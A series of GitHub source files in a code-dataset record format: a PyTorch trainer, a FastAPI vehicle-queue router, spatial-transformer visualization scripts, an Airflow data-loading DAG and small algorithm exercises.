print(\"loading best model\")\r\n self.model.load_state_dict(torch.load(os.path.join(self.logging_args.output_dir, \"best_model.pt\")))\r\n\r\n def _run_train(self, train_epoch, stop_checker):\r\n while True:\r\n train_epoch.run_train_epoch()\r\n # check if need to evaluate model, save model, and/or stop training\r\n stop_training = self._maybe_eval_save_stop(stop_checker)\r\n if stop_training:\r\n return\r\n\r\n def _log_train_completion(self, train_start_time):\r\n # log training completion and save train results\r\n self.logger.info(f\"Stopping TRAIN after {self.train_hist.epoch} epochs, {self.train_hist.step} total steps\")\r\n train_time = time.time() - train_start_time\r\n self.train_hist.add_train_time_info(train_time)\r\n self.logger.info(\"TRAIN finished in {:.2f} seconds\".format(train_time))\r\n if self.logging_args.save_last_model:\r\n self.model.save(self.logging_args.output_dir, \"final_model\")\r\n self._save_train_hist(\"train_history.json\")\r\n\r\n def evaluate(self, eval_dataset=None, eval_name=\"val\", save_results=True):\r\n \"\"\"\r\n Evaluate model. Can be called multiple times (e.g., with different datasets).\r\n :param eval_dataset: dataset to evaluate model with\r\n :param eval_name: name of evaluation, used in naming output result files\r\n :param save_results: if True, save eval results\r\n \"\"\"\r\n # set dataset to default if not passed as argument\r\n if eval_dataset is None:\r\n eval_dataset = self.val_dataset\r\n evaluator = self._get_evaluator(eval_dataset)\r\n eval_results = evaluator.evaluate()\r\n if save_results:\r\n # save eval metrics\r\n self._save_eval_results(eval_results.metrics, f\"{eval_name}_evaluation_metrics.json\")\r\n if self.eval_args.save_preds:\r\n eval_results.save_preds(self.logging_args.output_dir)\r\n return eval_results\r\n\r\n def _get_evaluator(self, eval_dataset):\r\n evaluator = Evaluator(\r\n self.model,\r\n self.model_input_args,\r\n self.multi_proc_args,\r\n self.loss_args,\r\n self.logger,\r\n eval_dataset,\r\n self.eval_args\r\n )\r\n return evaluator\r\n\r\n def _maybe_eval_save_stop(self, stop_checker):\r\n stop_training = False\r\n do_eval = (self.val_dataset is not None and self.train_hist.epoch % self.eval_args.eval_epochs == 0)\r\n if do_eval:\r\n # evaluate model\r\n self.logger.info(f\"Evaluating model after {self.train_hist.epoch} epochs\")\r\n eval_metrics = dict()\r\n if \"val\" in self.eval_args.splits:\r\n val_eval_metrics = self.evaluate().metrics\r\n for k, v in val_eval_metrics.items():\r\n eval_metrics[f\"val_{k}\"] = v\r\n if \"train\" in self.eval_args.splits:\r\n train_eval_metrics = self.evaluate(self.train_dataset, eval_name=\"train\").metrics\r\n for k, v in train_eval_metrics.items():\r\n eval_metrics[f\"train_{k}\"] = v\r\n self.train_hist.add_eval_result(eval_metrics, self.train_hist.epoch)\r\n if do_eval or \\\r\n (self.opt_args.best_metric_data == \"train\" and self.opt_args.best_metric == \"loss\"):\r\n if stop_checker.apply_early_stopping:\r\n # check if should stop early (need to check before updating best so far)\r\n stop_training = stop_checker.check_early_stop(self.train_hist)\r\n if stop_training:\r\n self.logger.info(f\"Stopping TRAIN early after {self.train_hist.epoch} epochs, \"\r\n f\"{self.train_hist.step} total steps\")\r\n # check if latest epoch is best so far & update best so far based on this\r\n best_so_far = self.train_hist.check_update_best_so_far()\r\n if best_so_far:\r\n self.logger.info(f\"{self.opt_args.best_metric_data}-{self.opt_args.best_metric} is best so far\")\r\n # check if should save model\r\n if self.logging_args.save_best_model:\r\n self.model.save(self.logging_args.output_dir, \"best_model\")\r\n if not stop_training:\r\n # check if should stop based on timing criteria\r\n stop_training = stop_checker.check_stop(self.train_hist.epoch,\r\n self.train_hist.step,\r\n self.train_hist.sample_count)\r\n return stop_training\r\n\r\n def _save_train_hist(self, file_name):\r\n train_hist_dict = copy.deepcopy(self.train_hist.__dict__)\r\n file_path = os.path.join(self.logging_args.output_dir, file_name)\r\n for k, v in train_hist_dict.items():\r\n # check if json serializable\r\n if not is_jsonable(v):\r\n train_hist_dict[k] = str(v)\r\n with open(file_path, 'w') as outfile:\r\n json.dump(train_hist_dict, outfile)\r\n\r\n def _save_eval_results(self, eval_metrics, file_name):\r\n file_path = os.path.join(self.logging_args.output_dir, file_name)\r\n with open(file_path, 'w') as outfile:\r\n json.dump(eval_metrics, outfile)\r\n\r\n def _get_logger(self):\r\n if self.logging_args.verbose:\r\n logging.basicConfig(format='%(asctime)s %(levelname)-8s %(message)s', level=logging.INFO, stream=sys.stdout,\r\n datefmt='%Y-%m-%d %H:%M:%S')\r\n else:\r\n output_file = os.path.join(self.logging_args.output_dir, \"training.log\")\r\n logging.basicConfig(format='%(asctime)s %(levelname)-8s %(message)s', filename=output_file, filemode=\"w+\",\r\n level=logging.INFO, datefmt='%Y-%m-%d %H:%M:%S')\r\n return logging.getLogger()\r\n\r\n def _get_opt_args(self):\r\n return OptimizationArguments(**self.train_args_dict[\"opt_args\"])\r\n\r\n def _get_loss_args(self):\r\n return LossArguments(**self.train_args_dict[\"loss_args\"])\r\n\r\n def _get_log_args(self):\r\n return LoggingArgs(**self.train_args_dict[\"log_args\"])\r\n\r\n def _get_eval_args(self):\r\n args = {}\r\n if \"eval_args\" in self.train_args_dict:\r\n args = self.train_args_dict[\"eval_args\"]\r\n return EvalArgs(**args)\r\n\r\n def _setup_model(self):\r\n # setup model --> note: we use loss function *within* model to make data parallel easier\r\n self.model.set_loss_fn(self.loss_args.get_loss_fn())\r\n if self.multi_proc_args.apply_data_parallel:\r\n self.model = nn.DataParallel(self.model)\r\n self.model = self.model.to(self.device)\r\n\r\n def _init_train_history(self):\r\n return TrainHistory(self.opt_args.best_metric, self.opt_args.best_metric_data, self.opt_args.greater_is_better)\r\n\r\n def _get_train_dataloader(self):\r\n return DataLoader(\r\n self.train_dataset,\r\n batch_size=self.opt_args.batch_size,\r\n shuffle=True,\r\n num_workers=self.multi_proc_args.num_workers,\r\n pin_memory=True,\r\n drop_last=True\r\n )\r\n","repo_name":"kmatton/contrastive-learning-for-eda","sub_path":"modeling/training/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":10456,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"9957864438","text":"from typing import List, Optional\nfrom fastapi import APIRouter, Depends\nfrom auth import auth\nfrom models.matatu import Matatu, Date\nfrom models.user import User\nfrom crud import matatu\n\nrouter = APIRouter(\n prefix=\"/matatus\",\n tags=[\"matatus\"],\n)\n\n#Read all matatus \n@router.get(\"/\" )\nasync def read_matatus (current_user : User = Depends(auth.get_current_user)):\n return matatu.find_all_matatus()\n\n#read matatu waiting List\n@router.get(\"/waiting\")\nasync def read_waiting_matatus():\n return matatu.find_waiting_matatus()\n\n#read matatu done List\n@router.get(\"/done\")\nasync def read_done_matatus():\n return matatu.find_done_matatus()\n\n#read matatu done List\n@router.get(\"/search\")\nasync def search_matatus(query: Optional[str] = None, current_user : User = Depends(auth.get_current_user)):\n return matatu.search_matatu(query)\n\n\n#read one matatu \n@router.get(\"/{reg}\")\nasync def read_one_matatu(reg: str, current_user : User = Depends(auth.get_current_user)):\n return matatu.find_one_matatu(reg)\n \n\n#add matatu to waiting List\n@router.post(\"/waiting\")\nasync def add_matatu(data: List[Matatu], current_user : User = Depends(auth.get_current_user)):\n return matatu.add_matatu_waiting(data)\n\n#add one matatu to db\n@router.post(\"/\")\nasync def add_matatu(data: Matatu, current_user : User = Depends(auth.get_current_user)):\n return matatu.create_matatu(data)\n\n#Edit status details\n@router.put(\"/waiting/{reg}\")\nasync def update_status_details(reg: str, date: Date, current_user : User = Depends(auth.get_current_user)):\n return matatu.update_waiting_status(reg, date)\n\n#Edit matatu details\n@router.put(\"/{reg}\")\nasync def edit_matatu_details(reg: str, data: Matatu, current_user : User = Depends(auth.get_current_user)):\n return matatu.update_matatu(reg, data)\n\n#delete matatu \n@router.delete(\"/waiting/{reg}\")\nasync def delete_matatu_waiting(reg: str, current_user : User = Depends(auth.get_current_user)):\n return matatu.delete_matatu_waiting(reg)\n\n#delete matatu \n@router.delete(\"/{reg}\")\nasync def delete_matatu(reg: str, current_user : User = Depends(auth.get_current_user)):\n return matatu.delete_matatu(reg)","repo_name":"maxwellwachira/vehicle-shifter-backend","sub_path":"routes/matatu.py","file_name":"matatu.py","file_ext":"py","file_size_in_byte":2150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30297901323","text":"#!/usr/bin/env python\n\"\"\"\nVisualize debug information.\n\nExample\n ./vis_tran.py bird v1 alexS1S2 --nstn 1 --epo 1:2\n\nHistory\n create - Feng Zhou (zhfe99@gmail.com), 2015-08\n modify - Feng Zhou (zhfe99@gmail.com), 2015-12\n\"\"\"\nimport argparse\nimport os\nimport numpy as np\nimport py_lib as lib\nlib.prSet(3)\n\n\ndef shEpoTrImg(dbe, ver, con, nStn, epo, iBat=1):\n \"\"\"\n Show the transformation of each epoch.\n\n Input\n dbe - database\n ver - version\n con - configuration\n nStn - #stn\n epo - epoch id\n iBat - batch id\n \"\"\"\n # fold\n nm = '{}_{}_{}'.format(dbe, ver, con)\n tmpFold = os.path.join(os.environ['HOME'],\n 'save/{}/torch/tmp/{}'.format(dbe, nm))\n outFold = os.path.join(os.environ['HOME'],\n 'save/{}/torch/deb_stn/{}'.format(dbe, nm))\n lib.mkDir(outFold)\n\n # path\n outPath = '{}/tr_{}_{}_img.jpg'.format(outFold, epo, iBat)\n\n # read from hdf\n h5Path = '{}/tr_{}_{}_grid.h5'.format(tmpFold, epo, iBat)\n ha = lib.hdfRIn(h5Path)\n gridCorns = lib.cells(nStn)\n for iStn in range(nStn):\n gridCorns[iStn] = lib.hdfR(ha, 'gridCorn{}'.format(iStn + 1))\n lib.hdfROut(ha)\n\n # read from hdf\n h5Path = '{}/tr_{}_{}_img_in.h5'.format(tmpFold, epo, iBat)\n ha = lib.hdfRIn(h5Path)\n imgIn0 = lib.hdfR(ha, 'imgIn0')\n imgIns = lib.cells(nStn)\n for iStn in range(nStn):\n imgIns[iStn] = lib.hdfR(ha, 'imgIn{}'.format(iStn + 1))\n lib.hdfROut(ha)\n\n # dimension\n n, _, h, w = imgIn0.shape\n nTop = min(n, 7)\n\n # show\n rows = 2\n cols = nTop\n Ax = lib.iniAx(1, nStn * rows, cols, [3 * nStn * rows, 3 * cols], flat=False)\n\n # each transformer\n for iStn in range(nStn):\n grid = gridCorns[iStn]\n\n # each example\n for iTop in range(nTop):\n col = iTop\n\n # original input\n lib.shImg(imgIn0[iTop].transpose((1, 2, 0)), ax=Ax[iStn * 2, col])\n\n idxYs = [0, 0, 1, 1, 0]\n idxXs = [0, 1, 1, 0, 0]\n xs, ys = lib.zeros(5, n=2)\n for i in range(5):\n idxY = idxYs[i]\n idxX = idxXs[i]\n\n ys[i] = (grid[iTop, idxY, idxX, 0] + 1) / 2 * h\n xs[i] = (grid[iTop, idxY, idxX, 1] + 1) / 2 * w\n lib.plt.plot(xs, ys, 'r-')\n # lib.plt.axis('image')\n\n # input\n lib.shImg(imgIns[iStn][iTop].transpose((1, 2, 0)), ax=Ax[iStn * 2 + 1, col])\n\n # mean\n # inMe0 = input0.mean(0)\n # inMe = input.mean(0)\n # lib.shImg(inMe0.transpose((1, 2, 0)), ax=Ax[iStn * 2, nTop])\n # lib.shImg(inMe.transpose((1, 2, 0)), ax=Ax[iStn * 2 + 1, nTop])\n\n # save\n # lib.show()\n lib.shSvPath(outPath, type='jpg')\n\n\ndef shEpoTrGrid(dbe, ver, con, nStn, epo, iBat=1):\n \"\"\"\n Show the transformation of each epoch.\n\n Input\n dbe - database\n ver - version\n con - configuration\n nStn - #stn\n epo - epoch id\n iBat - batch id\n \"\"\"\n # fold\n nm = '{}_{}_{}'.format(dbe, ver, con)\n tmpFold = os.path.join(os.environ['HOME'],\n 'save/{}/torch/tmp/{}'.format(dbe, nm))\n outFold = os.path.join(os.environ['HOME'],\n 'save/{}/torch/deb_stn/{}'.format(dbe, nm))\n lib.mkDir(outFold)\n\n # path\n h5Path = '{}/tr_{}_{}_grid.h5'.format(tmpFold, epo, iBat)\n outPath = '{}/tr_{}_{}_grid.jpg'.format(outFold, epo, iBat)\n\n # read from hdf\n ha = lib.hdfRIn(h5Path)\n gridCorns, gridGrads, imgOuts = lib.cells(nStn, n=3)\n for iStn in range(nStn):\n gridCorns[iStn] = lib.hdfR(ha, 'gridCorn{}'.format(iStn + 1))\n gridGrads[iStn] = lib.hdfR(ha, 'gridGrad{}'.format(iStn + 1))\n imgOuts[iStn] = lib.hdfR(ha, 'imgOut{}'.format(iStn + 1))\n lib.hdfROut(ha)\n\n # dimension\n n, _, _, _ = gridCorns[0].shape\n _, h, w, _ = gridGrads[0].shape\n\n # show\n rows = 1\n cols = 3\n Ax = lib.iniAx(1, nStn * rows, cols, [3 * nStn * rows, 3 * cols], flat=False)\n\n # each transformer\n for iStn in range(nStn):\n # show grid\n lib.setAx(Ax[iStn, 0])\n co = 0\n for iExp in range(n):\n idxYs = [0, 0, 1, 1, 0]\n idxXs = [0, 1, 1, 0, 0]\n xs, ys = lib.zeros(5, n=2)\n for i in range(5):\n idxY = idxYs[i]\n idxX = idxXs[i]\n\n ys[i] = (gridCorns[iStn][iExp, idxY, idxX, 0] + 1) / 2 * h\n xs[i] = (gridCorns[iStn][iExp, idxY, idxX, 1] + 1) / 2 * w\n if np.any(xs < 0) or np.any(xs > w) or np.any(ys < 0) or np.any(ys > h):\n co += 1\n lib.plt.plot(xs, ys, 'r-')\n lib.plt.axis('equal')\n lib.plt.axis([0, h, 0, w])\n lib.plt.gca().invert_yaxis()\n lib.plt.title('{}/{}'.format(co, n))\n\n # show gradient\n lib.setAx(Ax[iStn, 1])\n GX = gridGrads[iStn][0][:, :, 0]\n GY = gridGrads[iStn][0][:, :, 1]\n Q = lib.plt.quiver(GX, GY)\n lib.plt.quiverkey(Q, 0.5, 0.92, 2, '', labelpos='W')\n lib.plt.axis([0, h, 0, w])\n lib.plt.gca().invert_yaxis()\n\n gX = gridGrads[iStn][0][:, :, 0].mean()\n gY = gridGrads[iStn][0][:, :, 1].mean()\n lib.plt.title('{:.2f} {:.3e}'.format(np.arctan2(gY, gX) * 180 / np.pi, np.linalg.norm([gX, gY])))\n\n # show average image\n lib.shImg(imgOuts[iStn][0].transpose((1, 2, 0)), ax=Ax[iStn, 3])\n\n # save\n # lib.show()\n lib.shSvPath(outPath, type='jpg')\n\n\ndef shEpoTran(dbe, ver, con, nStn, epo, iBat=1):\n \"\"\"\n Show the transformation of each epoch.\n\n Input\n dbe - database\n ver - version\n con - configuration\n nStn - #stn\n epo - epoch id\n iBat - batch id\n \"\"\"\n # fold\n nm = '{}_{}_{}'.format(dbe, ver, con)\n tmpFold = os.path.join(os.environ['HOME'],\n 'save/{}/torch/tmp/{}'.format(dbe, nm))\n outFold = os.path.join(os.environ['HOME'],\n 'save/{}/torch/deb_stn/{}'.format(dbe, nm))\n lib.mkDir(outFold)\n\n # path\n h5Path = '{}/test_{}_{}.h5'.format(tmpFold, epo, iBat)\n outPath = '{}/test_{}_{}.jpg'.format(outFold, epo, iBat)\n\n # read from hdf\n ha = lib.hdfRIn(h5Path)\n inputs, grids = [], []\n for iStn in range(nStn):\n gridi = lib.hdfR(ha, 'grid{}'.format(iStn + 1))\n inputi = lib.hdfR(ha, 'input{}'.format(iStn + 1))\n grids.append(gridi)\n inputs.append(inputi)\n input0 = lib.hdfR(ha, 'input0')\n # bias = lib.hdfR(ha, 'bias')\n # weight = lib.hdfR(ha, 'weight')\n lib.hdfROut(ha)\n\n # dimension\n n, h, w, _ = grids[0].shape\n nTop = min(input0.shape[0], 7)\n\n # show\n cols = nTop + 1\n Ax = lib.iniAx(1, nStn * 2, cols, [3 * nStn * 2, 3 * cols], flat=False)\n\n lib.setAx(Ax[0, nTop])\n lib.plt.axis('off')\n\n # each transformer\n for iStn in range(nStn):\n input = inputs[iStn]\n grid = grids[iStn]\n\n # each example\n for iTop in range(nTop):\n col = iTop\n\n # original input\n input0New = input0[iTop].transpose((1, 2, 0))\n lib.shImg(input0New, ax=Ax[iStn * 2, col])\n\n idxYs = [0, 0, h - 1, h - 1, 0]\n idxXs = [0, w - 1, w - 1, 0, 0]\n xs, ys = lib.zeros(5, n=2)\n for i in range(5):\n idxY = idxYs[i]\n idxX = idxXs[i]\n\n ys[i] = (grid[iTop, idxY, idxX, 0] + 1) / 2 * h\n xs[i] = (grid[iTop, idxY, idxX, 1] + 1) / 2 * w\n lib.plt.plot(xs, ys, 'r-')\n lib.plt.axis('image')\n\n # input\n inputNew = input[iTop].transpose((1, 2, 0))\n lib.shImg(inputNew, ax=Ax[iStn * 2 + 1, col])\n\n # mean\n inMe0 = input0.mean(0)\n inMe = input.mean(0)\n lib.shImg(inMe0.transpose((1, 2, 0)), ax=Ax[iStn * 2, nTop])\n lib.shImg(inMe.transpose((1, 2, 0)), ax=Ax[iStn * 2 + 1, nTop])\n\n # save\n # lib.show()\n lib.shSvPath(pdfPath)\n\n\ndef shEpoTranCmp(dbe, ver, con, nStn, epo, iBat=1, rows=2, cols=5):\n \"\"\"\n Show the transformation of each epoch in a more compressed way.\n\n Input\n dbe - database\n ver - version\n con - configuration\n nStn - #stn\n epo - epoch id\n iBat - batch id\n rows - #row, {2}\n cols - #col, {5}\n \"\"\"\n # fold\n nm = '{}_{}_{}'.format(dbe, ver, con)\n tmpFold = os.path.join(os.environ['HOME'],\n 'save/{}/torch/tmp/{}'.format(dbe, nm))\n pdfFold = os.path.join(os.environ['HOME'],\n 'save/{}/torch/deb_stn/{}'.format(dbe, nm))\n lib.mkDir(pdfFold)\n\n # path\n h5Path = '{}/test_{}_{}.h5'.format(tmpFold, epo, iBat)\n\n # read from hdf\n ha = lib.hdfRIn(h5Path)\n inputs, grids = [], []\n for iStn in range(nStn):\n gridi = lib.hdfR(ha, 'grid{}'.format(iStn + 1))\n inputi = lib.hdfR(ha, 'input{}'.format(iStn + 1))\n grids.append(gridi)\n inputs.append(inputi)\n input0 = lib.hdfR(ha, 'input0')\n lib.hdfROut(ha)\n\n # dimension\n n, h, w, _ = grids[0].shape\n nGrp = n / (rows * cols)\n\n # each group\n for iGrp in range(nGrp):\n # group path\n pdfPath = '{}/test_{}_{}_{}.pdf'.format(pdfFold, epo, iBat, iGrp)\n\n # show\n Ax = lib.iniAx(1, rows, cols, [3 * rows, 3 * cols], flat=False)\n\n # each example\n for iExp in range(rows * cols):\n # position\n pExp = iGrp * rows * cols + iExp\n row = iExp / cols\n col = iExp % cols\n\n # original input\n input0New = input0[pExp].transpose((1, 2, 0))\n lib.shImg(input0New, ax=Ax[row, col])\n\n # each transformer\n for iStn in range(nStn):\n grid = grids[iStn]\n\n idxYs = [0, 0, h - 1, h - 1, 0]\n idxXs = [0, w - 1, w - 1, 0, 0]\n xs, ys = lib.zeros(5, n=2)\n for i in range(5):\n idxY = idxYs[i]\n idxX = idxXs[i]\n\n ys[i] = (grid[pExp, idxY, idxX, 0] + 1) / 2 * h\n xs[i] = (grid[pExp, idxY, idxX, 1] + 1) / 2 * w\n\n _, cl = lib.genMkCl(iStn)\n lib.plt.plot(xs, ys, '-', color=cl)\n lib.plt.axis('image')\n # save\n # lib.show()\n lib.shSvPath(pdfPath)\n\n\ndef shEpoGrad(dbe, ver, con, nStn, epo):\n \"\"\"\n Show the gradient of each epoch.\n\n Input\n dbe - database\n ver - version\n con - configuration\n nStn - #stn\n epo - epoch id\n \"\"\"\n tmpFold = os.path.join(os.environ['HOME'],\n 'save/{}/torch/tmp/{}_{}_{}'.format(dbe, dbe, ver, con))\n pdfFold = os.path.join(os.environ['HOME'],\n 'save/{}/torch/deb_stn/{}_{}_{}'.format(dbe, dbe, ver, con))\n lib.mkDir(pdfFold)\n\n # path\n h5Path = '{}/train_{}_{}_grad.h5'.format(tmpFold, epo, 1)\n pdfPath = '{}/train_{}_{}_grad.pdf'.format(pdfFold, epo, 1)\n\n # read from hdf\n ha = lib.hdfRIn(h5Path)\n imgOuts, imgGrads, gridOuts, gridGrads = [], [], [], []\n for iStn in range(nStn):\n imgOuts.append(lib.hdfR(ha, 'imgOut{}'.format(iStn + 1)))\n imgGrads.append(lib.hdfR(ha, 'imgGrad{}'.format(iStn + 1)))\n gridOuts.append(lib.hdfR(ha, 'gridOut{}'.format(iStn + 1)))\n gridGrads.append(lib.hdfR(ha, 'gridGrad{}'.format(iStn + 1)))\n imgOut0 = lib.hdfR(ha, 'imgOut0')\n # bias = lib.hdfR(ha, 'bias')\n # weight = lib.hdfR(ha, 'weight')\n lib.hdfROut(ha)\n\n # dimension\n n, d, h, w = imgOut0.shape\n nTop = min(n, 7)\n\n # show\n cols = nTop\n rowStn = 4\n Ax = lib.iniAx(1, nStn * rowStn, cols, [3 * nStn * rowStn, 3 * cols], flat=False)\n\n # each transformer\n for iStn in range(nStn):\n imgOut = imgOuts[iStn]\n imgGrad = imgGrads[iStn]\n gridOut = gridOuts[iStn]\n gridGrad = gridGrads[iStn]\n\n # each example\n for iTop in range(nTop):\n col = iTop\n\n # original input\n lib.shImg(imgOut0[iTop].transpose((1, 2, 0)), ax=Ax[iStn * rowStn, col])\n\n idxYs = [0, 0, h - 1, h - 1, 0]\n idxXs = [0, w - 1, w - 1, 0, 0]\n xs, ys = lib.zeros(5, n=2)\n for i in range(5):\n idxY = idxYs[i]\n idxX = idxXs[i]\n\n ys[i] = (gridOut[iTop, idxY, idxX, 0] + 1) / 2 * h\n xs[i] = (gridOut[iTop, idxY, idxX, 1] + 1) / 2 * w\n lib.plt.plot(xs, ys, 'r-')\n # lib.plt.axis('image')\n\n # crop input\n lib.shImg(imgOut[iTop].transpose((1, 2, 0)), ax=Ax[iStn * rowStn + 1, col])\n\n # image gradient\n imgGradMa = imgGrad[iTop].max()\n imgGradMi = imgGrad[iTop].min()\n lib.shImg((imgGrad[iTop] - imgGradMi) / (imgGradMa - imgGradMi), ax=Ax[iStn * rowStn + 2, col])\n\n # grid gradient\n lib.setAx(Ax[iStn * rowStn + 3, col])\n GX = gridGrad[iTop][:, :, 0]\n GY = gridGrad[iTop][:, :, 1]\n Q = lib.plt.quiver(GX, GY)\n qk = lib.plt.quiverkey(Q, 0.5, 0.92, 2, '', labelpos='W')\n # lib.plt.axis('image')\n lib.plt.gca().invert_yaxis()\n\n # mean\n # inMe0 = input0.mean(0)\n # inMe = input.mean(0)\n # lib.shImg(inMe0.transpose((1, 2, 0)), ax=Ax[iStn * 2, nTop])\n # lib.shImg(inMe.transpose((1, 2, 0)), ax=Ax[iStn * 2 + 1, nTop])\n\n # save\n # lib.show()\n # import pdb; pdb.set_trace()\n lib.shSvPath(pdfPath)\n\nif __name__ == '__main__':\n # argument\n parser = argparse.ArgumentParser()\n parser.add_argument('inputs', nargs='+', help='dbe ver con')\n parser.add_argument('--nstn', help='#stn', default=1, dest='nStn', type=int)\n parser.add_argument('--epo', help='epo range', default='1:2', dest='epos')\n parser.add_argument('--bat', help='batch range', default='1:2', dest='bats')\n args = parser.parse_args()\n\n dbe = args.inputs[0]\n ver = args.inputs[1]\n con = args.inputs[2]\n\n epos = lib.str2ran(args.epos)\n bats = lib.str2ran(args.bats)\n\n nEpo = len(epos)\n nBat = len(bats)\n nStn = args.nStn\n\n # each epoch\n lib.prCIn('epo', nEpo, 1)\n for iEpo in range(nEpo):\n lib.prC(iEpo)\n\n # shEpoTran(dbe, ver, con, nStn, epo)\n # shEpoGrad(dbe, ver, con, nStn, epo)\n\n lib.prCIn('bat', nBat, 1)\n for iBat in range(nBat):\n lib.prC(iBat)\n # shEpoTrImg(dbe, ver, con, nStn, epos[iEpo], bats[iBat])\n shEpoTrGrid(dbe, ver, con, nStn, epos[iEpo], bats[iBat])\n # shEpoTran(dbe, ver, con, nStn, epos[iEpo], bats[iBat])\n lib.prCOut(nBat)\n lib.prCOut(nEpo)\n","repo_name":"zhfe99/th_rec","sub_path":"vis_deb.py","file_name":"vis_deb.py","file_ext":"py","file_size_in_byte":13756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"4983021571","text":"class Solution:\n def subsetsWithDup(self, nums: List[int]) -> List[List[int]]:\n results = [[]]\n nums = sorted(nums)\n k = 0\n for i in range(len(nums)):\n if i > 0 and nums[i] == nums[i-1]:\n k += 1\n else:\n k = 0\n nres = results[:]\n for p in results:\n if (i == 0 or nums[i] != nums[i-1]):\n nres.append(p + [nums[i]])\n else:\n # Only append if the final k elems of p are all nums[i]\n if len(p) >= k and p[-k:] == [nums[i]] * k:\n nres.append(p + [nums[i]])\n results = nres\n\n return results\n\n \n","repo_name":"ZiningZhu/Leetcode","sub_path":"090-subsets2/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"25654799919","text":"import sys\nimport re\n\n\nfor line in sys.stdin:\n line = line.rstrip()\n print(re.match(r'\\b(\\w)(\\w)', line).groups())\n # line = re.sub(r'\\b(\\w)(\\w)(\\w*)\\b', r'\\2\\1\\3', line)\n line = re.sub(r'\\b(\\w)(\\w)', r'\\2\\1', line)\n print(line)","repo_name":"ayurkin/stepik_python_course","sub_path":"kurs_re_8.py","file_name":"kurs_re_8.py","file_ext":"py","file_size_in_byte":243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"16631127603","text":"from matplotlib import pyplot as plt\nimport os\nimport glob\nimport argparse\nimport torch\n\n\ndef cal_EPE(gt_flow, est_flow):\n return torch.norm(gt_flow - est_flow, 2, 1).mean()\n\n\norigin_path = 'C:/Users/zihaozhang/Desktop/git/FlowFormer-Official/datasets/abandonedfactory/Easy/P001/image_left/'\ngt_path = 'C:/Users/zihaozhang/Desktop/git/FlowFormer-Official/datasets/abandonedfactory/Easy/P001/flow_img/'\nflowformer_path = 'results/tartanair/things/'\npwcnet_path = 'results/tartanair/PWCNet/'\nsave_path = 'compare/tartanair/'\nif not os.path.exists(save_path):\n os.makedirs(save_path)\npattern = os.path.join(flowformer_path, '*.png')\nfilelist = sorted(glob.glob(pattern))\nfor i in range(367, len(filelist)):\n #4x4\n plt.subplot(221)\n plt.imshow(plt.imread(origin_path + str(i).zfill(6) + '_left.png'))\n plt.axis('off')\n plt.title('Source Image')\n plt.subplot(222)\n plt.imshow(plt.imread(gt_path + str(i).zfill(6) + '.png'))\n plt.axis('off')\n plt.title('Ground Truth')\n plt.savefig(save_path + str(i).zfill(6) + '.png')\n plt.subplot(223)\n plt.imshow(plt.imread(flowformer_path + str(i).zfill(6) + '.png'))\n plt.axis('off')\n plt.title('FlowFormer')\n plt.subplot(224)\n plt.imshow(plt.imread(pwcnet_path + str(i).zfill(6) + '.png'))\n plt.axis('off')\n plt.title('PWCNet')\n plt.savefig(save_path + str(i).zfill(6) + '.png')\n plt.close()\n print('已保存:{}/{}'.format(i + 1, len(filelist)))\n","repo_name":"Continy/FlowFormer","sub_path":"compare.py","file_name":"compare.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"24638749199","text":"\nimport requests\nimport csv\nfrom airflow import DAG\nfrom datetime import datetime\n\nfrom airflow.operators.python import PythonOperator\nfrom airflow.providers.postgres.operators.postgres import PostgresHook\nfrom airflow.providers.discord.operators.discord_webhook import DiscordWebhookOperator\nfrom airflow.operators.bash import BashOperator\nfrom airflow.utils.dates import days_ago\n\ncsv_path = \"/Users/pedro/grouparoo/airflow-test/data.csv\"\nwebhook_endpoint = \"webhooks/SOME_SECRET/WEBHOOK\"\n\ndef download_csv():\n resp = requests.get(\"https://raw.githubusercontent.com/grouparoo/grouparoo/main/core/__tests__/data/records-10.csv\")\n with open(csv_path, \"wb\") as f:\n for chunk in resp:\n f.write(chunk)\n\ndef load_csv():\n pg = PostgresHook(postgres_conn_id=\"grouparoo_profile_db\")\n\n with open(csv_path, 'r') as f:\n reader = csv.reader(f)\n rows = [tuple(row) for row in reader][1:]\n pg.insert_rows(\n \"profiles\", \n rows, \n target_fields=[\n \"id\", \n \"first_name\", \n \"last_name\", \n \"email\", \n \"gender\", \n \"ip_address\", \n \"ios_app\", \n \"android_app\", \n \"vip\", \n \"ltv\"\n ], \n replace=True,\n replace_index=\"id\"\n )\n\nwith DAG(\n 'grouparoo_demo', \n start_date=days_ago(1),\n schedule_interval=None\n) as dag:\n download = PythonOperator(\n task_id=\"download_csv\", \n python_callable=download_csv\n )\n\n load = PythonOperator(\n task_id=\"load_data\", \n python_callable=load_csv\n )\n\n grouparoo = BashOperator(\n task_id=\"run_grouparoo\", \n bash_command=\"cd ~/grouparoo/airflow-test && grouparoo run\"\n )\n\n notify_end = DiscordWebhookOperator(\n task_id=\"notify_end\", \n http_conn_id=\"discord\", \n webhook_endpoint=webhook_endpoint, \n message=\"Your workflow has finished running!\"\n )\n\n download >> load >> grouparoo >> notify_end\n\n","repo_name":"pedroslopez/airflow-demo","sub_path":"dags/grouparoo.py","file_name":"grouparoo.py","file_ext":"py","file_size_in_byte":2075,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"70152876281","text":"# This code solves the problem of finding the minimum number of operations needed\n# to transform a given number n into 1 using three possible operations\n\nimport math\n\nn = int(input())\n\n# number of operations required for getting 0, 1, 2,.. , n\n# list where each index i holds the minimum number of operations needed to transform the number i into 1.\nnum_operations = [0, 0] + [math.inf] * (n - 1)\n\nfor i in range(2, n + 1):\n temp1, temp2, temp3 = [math.inf] * 3\n\n temp1 = num_operations[i - 1] + 1\n if i % 2 == 0:\n temp2 = num_operations[i // 2] + 1\n if i % 3 == 0:\n temp3 = num_operations[i // 3] + 1\n min_ops = min(\n temp1, temp2, temp3\n ) # holds the minimum value among the three operations' costs,\n 